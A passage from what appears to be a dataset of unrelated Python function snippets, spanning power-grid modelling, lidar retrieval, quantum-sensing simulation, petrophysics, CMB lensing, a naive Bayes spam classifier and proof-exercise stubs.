[9, 14, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [10, 11, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [15, 16, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0]\r\n ])\r\n R1 = 0.43\r\n L1 = 0.4e-3\r\n RS1 = 0.32\r\n LS1 = 0.39e-3\r\n Zbase = (0.4*0.4/100)\r\n branch_phase =array([\r\n [1, 1, 2, 188, R1, L1],\r\n [2, 1 ,8, 346, R1, L1],\r\n [3 ,1 ,15,501, R1 ,L1],\r\n [4, 2, 3, 130, RS1,LS1],\r\n [5, 2, 6, 145, RS1,LS1],\r\n [6, 2 ,7, 157, RS1,LS1],\r\n [7, 3, 4, 185, RS1,LS1],\r\n [8, 4, 5, 1000,RS1,LS1],\r\n [9, 8 ,9, 416, RS1,LS1],\r\n [10,8 ,12,130, RS1,LS1],\r\n [11,8 ,13,121, RS1,LS1],\r\n [12,9 ,10,130, RS1,LS1],\r\n [13,9 ,14,127, RS1,LS1],\r\n [14,10,11,251, RS1,LS1],\r\n [15,15,16,345, RS1,LS1]\r\n ])\r\n ppc[\"branch\"][:, [2,3]] = multiply(array([branch_phase[:, 4]*branch_phase[:, 3], branch_phase[:, 4]*branch_phase[:, 4]*100*pi]).T,0.001/Zbase)\r\n\r\n ##----- OPF Data -----##\r\n ## area data\r\n # area refbus\r\n\r\n\r\n ## generator cost data\r\n # 1 startup shutdown n x1 y1 ... xn yn\r\n # 2 startup shutdown n c(n-1) ... c0\r\n\r\n\r\n return ppc", "def test_simple():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n EI, top, bot = bm.EI(sections, E)\n EIc = E * B * (H ** 3) / 12\n assert 0.99 < EI / EIc < 1.01\n assert top == H / 2\n assert bot == -H / 2", "def Char_Gate(NV,res ,B_field=400):\n\n\n #data = np.loadtxt(\"NV_Sim_8.dat\") #Placeholder data to test the script\n #NV = np.vstack((data[:,3],data[:,4]))\n #physical constants\n gamma_c = 1.071e3 #g-factor for C13 in Hz/G\n #Model parameters\n omega_larmor = 2*np.pi*gamma_c*B_field\n tau_larmor = 2*np.pi/omega_larmor\n tau = res[0]\n n_pulses = int(res[1]*2) #So that we do a pi -pulse\n\n Ix = 0.5 * np.array([[0,1],[1,0]])\n Iz = 0.5* np.array([[1,0],[0,-1]])\n H0 = (omega_larmor)*Iz\n exH0 =linalg.expm(-1j*H0*tau)\n\n\n M = np.zeros(np.shape(NV)[0])\n for idC in range(np.shape(NV)[0]):\n A= 2*np.pi*NV[idC,0]\n B= 2*np.pi*NV[idC,1] #Converts to radial frequency in Hz/G\n H1 = (A+omega_larmor) *Iz +B*Ix\n exH1 = linalg.expm(-1j*H1*tau)\n V0 = exH0.dot(exH1.dot(exH1.dot(exH0)))\n V1 = exH1.dot(exH0.dot(exH0.dot(exH1)))\n n0 = Calc_axis(V0)\n n1 =Calc_axis(V1)\n phi = np.real(2*np.arccos(np.trace(V0)/2))\n M[idC] = 1 - (1-np.dot(n0,n1))*np.sin(n_pulses * phi /2 )**2\n\n Signal = -M.prod()\n F = (1-(Signal+1)/2)\n return F", "def TR_algo7(self, p):\n h = 0\n ve = 0\n vd = self._vd\n m = max(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & ((~mu) & 2**self._N-1)\n l = [bit_component(px, i) for px in p]\n # 2. construct a integer whose bits are given by l\n l = sum( [lx*2**j for j, lx in enumerate(l)] )\n l = T(ve, vd, l)\n w = inverse_gc(l)\n r = gcr(w, mu, pi)\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % self._N\n h = (h << mu_norm) | r\n return h", "def OxygenTransmission(T,P,n_wv,wavelength,dr,freq_lim=np.array([lp.c/770e-9,lp.c/768e-9]),sim_nu=np.array([]),spec_file=''):\n # fraction of O2 by number density\n fO2 = (32*0.2320+28.02*0.7547+44.01*0.00046+39.94*0.0128+20.18*0.000012+4.0*0.0000007+83.8*0.000003+131.29*0.00004)*0.2320/32.0\n \n if len(spec_file) == 0:\n spec_file = '/Users/mhayman/Documents/DIAL/O2_HITRAN2012_760_781.txt'\n \n if sim_nu.size==0:\n sim_nu = np.arange(-3e9,3e9,20e6)\n \n# inu0 = np.argmin(np.abs(sim_nu)) # index to center of frequency array\n \n n_o2=fO2*(P/(lp.kB*T)-n_wv) # to convert atm to Pa use *101325\n ext_o2 = rb.ExtinctionFromHITRAN(lp.c/wavelength+sim_nu,T,P,(mO2*1e-3)/lp.N_A,nuLim=freq_lim,freqnorm=True,filename=spec_file).T\n T_o2 = np.exp(-np.cumsum(n_o2[np.newaxis,:]*ext_o2,axis=1)*dr)\n \n return T_o2,sim_nu", "def E_Dynamic_MavkoEtAl2009(rhob,DTS,PR):\n E = (2*(rhob*1000)*((304800/DTS)**2)*(1+PR))/1000000\n return E", "def TDErrorFunction(Prof,x,Trx,rb_spec,abs_spec,dr,inu0,bsrMult,base_T,base_P,r0,lam=[0,0,0,0,0,0]):\n \n iR = Prof['WV Online'].size # range index for a profile into 1D x array\n x2 = np.reshape(x,(iR+1,6))\n xK = x2[0,:] # constants [HSRL Mol HSRL Comb, WV On, WV Off, O2 On ,O2 Off]\n xS = x2[1:,:] # state vector [T, nWV, BSR, phi_HSRL, phi_WV, phi_O2]\n \n # HSRLProfile(T,BSR,phi,rb_spec,Trx,inu0,K,base_T,base_P)\n HSRL_mol = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Mol'],inu0['HSRL'],xK[0],base_T,base_P)+Prof['HSRL Mol BG']\n HSRL_comb = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Comb'],inu0['HSRL'],xK[1],base_T,base_P)+Prof['HSRL Comb BG']\n \n# WVDIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n WV_on = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Online'],abs_spec['WV Online'],Trx['WV Online'],inu0['WV Online'],xK[2],base_T,base_P,dr,r0)+Prof['WV Online BG']\n WV_off = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Offline'],abs_spec['WV Offline'],Trx['WV Offline'],inu0['WV Offline'],xK[3],base_T,base_P,dr,r0)+Prof['WV Offline BG']\n\n# O2DIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n O2_on = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Online'],abs_spec['O2 Online'],Trx['O2 Online'],inu0['O2 Online'],xK[4],base_T,base_P,dr,r0)+Prof['O2 Online BG']\n O2_off = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Offline'],abs_spec['O2 Offline'],Trx['O2 Offline'],inu0['O2 Offline'],xK[5],base_T,base_P,dr,r0)+Prof['O2 Offline BG']\n \n# # Optimization error. T is piecewise\n# OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n# +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n# +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n# +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n# +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n# +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n# +lam[0]*np.nansum(np.abs(np.diff(xS[:,0]))) \\\n# +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n# +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n# +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n# +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n# +lam[5]*np.nansum(np.abs(np.diff(xS[:,5]))) \n \n # Optimization error. T is piecewise slope\n OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n +lam[0]*np.nansum(np.abs(np.diff(np.diff(xS[:,0])))) \\\n +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n +lam[5]*np.nansum(np.abs(np.diff(xS[:,5])))\n \n return OptError", "def _r_inv(self):\n raise NotImplementedError", "def test_inu(self):\n lmax = 3\n x = np.array([5000])\n result_i, result_k = bessel_sk.lniknu(x, lmax)\n pih = np.log(0.5*np.pi)\n expP = (1+np.exp(-2*x))\n expM = (1-np.exp(-2*x))\n expected_i = np.array([\n -np.log(2*x**1) + x + np.log(expM),\n -np.log(2*x**2) + x + np.log(expM*(x+1)+x-1),\n -np.log(2*x**3) + x + np.log((3+x**2)*expM-3*x*expP),\n -np.log(2*x**4) + x + np.log((15*x+x**3)*expP-(15+6*x**2)*expM) \n ])\n expected_k = np.array([pih -x - 1*np.log(x),\n pih -x - 2*np.log(x) + np.log(x+1),\n pih -x - 3*np.log(x) + np.log(x**2+3*x+3),\n pih -x - 4*np.log(x) + np.log(x**3+6*x**2+15*x+15)\n ])\n assert_almost_equal(result_i[0]/expected_i.T, 1, decimal=4)\n assert_almost_equal(result_k[0]/expected_k.T, 1, decimal=4)", "def TMM(x,N,n,trun_basis):\n Mat = np.zeros([len(trun_basis),len(trun_basis)])\n print('making TMM')\n perms = [int((x**n * iii)%N) for iii in trun_basis] # Modular multiplication\n for iii in range(len(trun_basis)):\n if trun_basis.__contains__(perms[iii]):\n Mat[iii,trun_basis.index(perms[iii])] = 1\n return Mat", "def ev2vi_nrl(eV,mu):\n return 9.79e3/np.sqrt(mu)*np.sqrt(2.*eV)", "def intf_ENTPGRAM(E):\n # !! Need to check for some eids being TRIs. Filter that out.\n if ( not inc.entid_or_LST_of_entids(E.The,3) or \n not inc.point_formatted_LST(E.The,2) or\n not inc.point_formatted_LST(E.The,1) ):\n print(\"Input Error: pgram\")\n print(intf_ENTPGRAM.__doc__)\n return # Without doing much of anything.\n oB= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n oA= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n myeids= E.The.StackPop().val\n if type(myeids)==type(list()):\n #myeids= map(lambda x:x.val, myeids) # Should now be a list of ints.\n myeids= [x.val for x in myeids] # Should now be a list of ints.\n else:\n myeids= [ myeids ] # Also a (1 item) list of ints.\n neweidlist= []\n for myeid in myeids:\n if myeid in MMEL.El: # Check if eid exists.\n src_ent= MMEL.El[myeid]\n new_ent= src_ent.duplicate()\n new_ent.translate([ oB[0]-oA[0], oB[1]-oA[1], oB[2]-oA[2] ])\n As= mm.Entity.allplist.PLdict[ src_ent.epts[0] ]\n Ae= mm.Entity.allplist.PLdict[ src_ent.epts[1] ]\n Bs= mm.Entity.allplist.PLdict[ new_ent.epts[0] ]\n Be= mm.Entity.allplist.PLdict[ new_ent.epts[1] ]\n neweidlist.append(new_ent.eid)\n MMEL.add_ent(new_ent)\n line_entS= mm.Line_Entity( [As,Bs] )\n neweidlist.append(line_entS.eid)\n MMEL.add_ent(line_entS)\n line_entE= mm.Line_Entity( [Ae,Be] )\n neweidlist.append(line_entE.eid)\n MMEL.add_ent(line_entE)\n tri_entA= mm.Tri_Entity( [As, Ae, Bs] )\n neweidlist.append(tri_entA.eid)\n MMEL.add_ent(tri_entA)\n tri_entB= mm.Tri_Entity( [Bs, Be, Ae] )\n neweidlist.append(tri_entB.eid)\n MMEL.add_ent(tri_entB)\n else:\n print(\"WARNING: Entity ID# %d does not exist.\" % myeid)\n if neweidlist:\n neweids= objectifier.StackOB_LST( [objectifier.StackOB_VAL(x) for x in neweidlist] )\n E.The.StackPush(neweids)\n OUT.default(MMEL,E) # AUTODUMP ", "def ORM1(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,DTCO,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dc2,Dk,Dpf],[HIc1,HIc2,HIk,HIpf],[DTc1,DTc2,DTk,DTpf],[1,1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=XMatrix[1] # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[2] # Volume of organic component\n\t\tPHIe=XMatrix[3] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def N_TT_TE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_TE(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTE(l2)\n result += self.F_TE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n\n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def getEG(n,int_method,func) :\n m = np.asarray([0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,2,2.5,3,3.5,4,\n 4.5,5,5.5,6,6.5,7,7.5,8,8.5,9,9.5,10])\n bes = np.asarray([0.5,0.47768,0.44879,0.39831,0.25858,0,0.15502,0.25699,\n 0.30896,0.35245,0.39119,0.51822,0.53678,0.54984,0.55847,\n 0.56395,0.57054,0.57950,0.58402,0.58765,0.59512,0.60214,\n 0.60469,0.61143,0.61789,0.62443,0.63097,0.63694])\n p = np.asarray([1,0.85417,0.94685,1.04467,2.55052,0,1.59086,\n 1.00670,0.88866,0.83763,0.81030,0.76108,0.83093,0.86863,\n 0.89233,0.90909,0.92097,0.93007,0.93735,0.94332,0.94813,\n 0.95193,0.95557,0.95864,0.96107,0.96360,0.96570,\n 0.96788])\n h0 = np.asarray([0,-0.03567,-0.04808,-0.04315,-0.01879,0,0.00041,0.00069,\n 0.00639,0.01405,0.02294,0.07814,0.13994,0.19278,0.23793,\n 0.27678,0.31039,0.33974,0.36585,0.38917,0.41003,0.42891,\n 0.44621,0.46195,0.47644,0.48982,0.50223,0.51379])\n h1 = np.asarray([0,0.26899, 0.10571,0.01763,-0.39382,0,0.15211,0.05665,\n 0.00933,-0.02791,-0.05876,-0.16720,-0.13033,-0.10455 ,\n -0.08618,-0.07208,-0.06179,-0.05369,-0.04715,-0.04176,\n -0.03742,-0.03408,-0.03081,-0.02808,-0.02599,-0.02375,\n -0.02194,-0.02004])\n h2 = np.asarray([0,-0.09016,-0.06893,-0.04971,-0.08828,0,-0.03341,\n -0.03964,-0.04456,-0.04775,-0.04984,-0.05381,-0.03570,\n -0.02476,-0.01789,-0.01333,-0.01028,-0.00812,-0.00653,\n -0.00534,-0.00444,-0.00376,-0.00319,-0.00274,-0.00238,\n -0.00207,-0.00182,-0.00160])\n h3 = np.asarray([0,0.03993,0.03363,0.02216,-0.00797,0,0.00899,0.01172,\n 0.01150,0.01026,0.00860,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h0 = splev(n,splrep(m, h0))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h0 = griddata(m, h0, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h0,int_h1,int_h2,int_h3])", "def createCNDTransEmiProb(self, qtc_type='qtcc'):\n \n if qtc_type == 'qtcb':\n state_num = 11\n elif qtc_type == 'qtcc':\n state_num = 83\n elif qtc_type == 'qtcbc':\n state_num = 92\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = []\n \n if qtc_type == 'qtcb':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2])\n elif qtc_type == 'qtcc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n elif qtc_type == 'qtcbc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2, np.NaN, np.NaN])\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = np.array(qtc)\n #np.savetxt('/home/cdondrup/qtc.csv', qtc, delimiter=',', fmt='%1f')\n \n trans = np.zeros((state_num, state_num))\n for i1 in xrange(qtc.shape[0]):\n for i2 in xrange(i1+1, qtc.shape[0]):\n trans[i1+1, i2+1] = np.nanmax(np.absolute(qtc[i1]-qtc[i2])) != 2\n if trans[i1+1, i2+1] == 1:\n for j1 in xrange(qtc.shape[1]-1):\n for j2 in xrange(j1+1, qtc.shape[1]):\n if sum(np.absolute(qtc[i1, [j1, j2]])) == 1 \\\n and sum(np.absolute(qtc[i2, [j1, j2]])) == 1:\n if np.nanmax(np.absolute(qtc[i1, [j1, j2]]-qtc[i2, [j1, j2]])) > 0 \\\n and sum(qtc[i1, [j1, j2]]-qtc[i2, [j1,j2]]) != 1:\n trans[i1+1, i2+1] = 5\n break\n if trans[i1+1, i2+1] != 1:\n break\n trans[i2+1, i1+1] = trans[i1+1, i2+1]\n \n trans[trans != 1] = 0\n #np.savetxt('/home/cdondrup/trans.csv', np.rint(trans).astype(int), delimiter=',', fmt='%i')\n trans[trans == 0] = 0.00001\n trans[0] = 1\n trans[:, 0] = 0\n trans[:, -1] = 1\n trans[0, -1] = 0\n trans[-1] = 0\n trans += np.dot(np.eye(state_num), 0.00001)\n trans[0, 0] = 0\n \n trans = trans / trans.sum(axis=1).reshape(-1, 1)\n #np.savetxt('/home/cdondrup/trans.csv', trans, delimiter=',')\n \n emi = np.eye(state_num)\n emi[emi == 0] = 0.0001\n \n return trans, emi", "def e_step(self):\n # update VMF probabilities (Equation (3))\n logP = np.dot(self.features, self.mu.T)*self.kappa + np.log(self.pi).reshape(1,-1) # n by k\n logP_norm = logP - logsumexp(logP, axis=1).reshape(-1,1)\n self.p = np.exp(logP_norm)\n self.mllk = np.mean(logsumexp(logP, axis=1))", "def calibration(N,kb,T,Ekinv,V):\n lamb = np.sqrt((N-1)*3*kb*T/(Ekinv*2))\n \n if lamb < 0.9999:\n V = lamb*V\n elif lamb>1.0001:\n V = lamb*V\n \n return V", "def __init__(self):\n self.modulo = Bn.from_decimal(\n \"104274339861599109435228713715012587636997755949475388588516377743858594829526246207815488124753620113654378182611410869843692693515483841382145633329409600605358434237971173658402530546783352648106247803514459454270482848535758539851532076708790494943517894654046363923325714750480680188239471613308156143136830981518627799499285672172738874571644891075726999700275877298890101149587792836886648258733566308895110719770960720300899066897289080371563621668124216187770149740826973622700315037066876583866156345639276386510201006397141393775575135928749962477326783336184434815042335057049432193006499521591281357491659\")\n self.generator = FFElement(Bn.from_decimal(\n \"81099144573950922883933823309397903831307729923277144841334749422315595743437219371821139976270089085817737914449263008752457618988770955139245864971428025146021819160336876692205993068777078938240475549226164124952577975303221660397947822711916352061614341728562734417872584743294922245761212731150483802964283263230741041446988298186702952974697967148198190463075071628059974486966250538161512056563568090071474143434146441589514816635339916481756264419884177841781745530245175458079612447970067897693825433138760936325168807521204548329680909932742314536162869895548442852131478295912996232046258690790851591666552\"),\n self.modulo, self.order())", "def prove_I0() -> Proof:\n # Task 4.8", "def testingPhase(SP, HP):\n classification= {}\n TP, TN, FP, FN = 0,0,0,0\n\n pullData = open(\"labels\", \"r\").read()\n dataArray= pullData.split('\\n')\n dataArrayTest=dataArray[21301:-1] #opens files from folder 070 onwards \n \n for eachLine in dataArrayTest:\n kind,file = eachLine.split(' ')\n print(file,kind)\n if (kind == \"spam\"):\n SO = 1 #initially stating that it is a spam not a ham\n HO = 0\n elif (kind== \"ham\"):\n HO = 1\n SO = 0\n file=file.strip('../') \n fileDir = os.path.dirname(os.path.realpath('__file__'))\n filepath = os.path.join(fileDir,file) \n email=\"\"\n fh = open(filepath, encoding=\"ascii\", errors=\"ignore\")\n for line in fh:\n email += line\n fh.close()\n email= email.lower()\n email_words = processText(contentEmail(email))\n email_words = tuple(email_words)\n spam_ba= math.log(PS,10) #initially contains value of Spam Probability\n ham_ba= math.log(PH, 10) #initially contains value of Ham Probability\n\n\n \"\"\"BAYES THEOREM\"\"\"\n for word, value in SP.items(): \n if word in email_words:\n x = math.log(value, 10)\n spam_ba += x\n else:\n x = math.log(1-value, 10)\n #print(x)\n spam_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n for word,value in HP.items(): \n if word in email_words:\n x = math.log(value, 10)\n #print(x)\n ham_ba += x \n else:\n x = math.log(1-value, 10)\n #print(x)\n ham_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n print(\"Spam Prob: \" ,spam_ba, \"Ham Prob: \" ,ham_ba)\n\n #This part determines if the emails are ham or spam depending on the calculations\n if HO == 1 and label == \"ham\":\n TN +=1\n if HO == 1 and label == \"spam\":\n FP +=1\n if SO == 1 and label == \"spam\":\n TP +=1\n if SO == 1 and label == \"ham\":\n FN +=1\n #print(classification)\n print(TP, TN, FP, FN)\n print(spam_ba)\n print(ham_ba)\n \"\"\"COMPUTES PRECISION AND RECALL\"\"\"\n Precision = TP/(TP+FP)\n Recall = TP/(TP+FN)\n\n print(\"Precision: \", Precision, \" \", \"Recall: \", Recall)", "def prove_NNE() -> Proof:\n # Optional Task 6.7b", "def test_create_tpm(self):\n command_line = self._MENU + [self._POOLNAME] + self._DEVICES + [\"--clevis=tpm2\"]\n TEST_RUNNER(command_line)", "def N_TT_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or 